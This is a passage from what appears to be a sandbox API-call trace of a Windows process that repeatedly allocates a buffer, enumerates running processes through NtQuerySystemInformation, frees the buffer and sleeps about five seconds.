ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.199] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 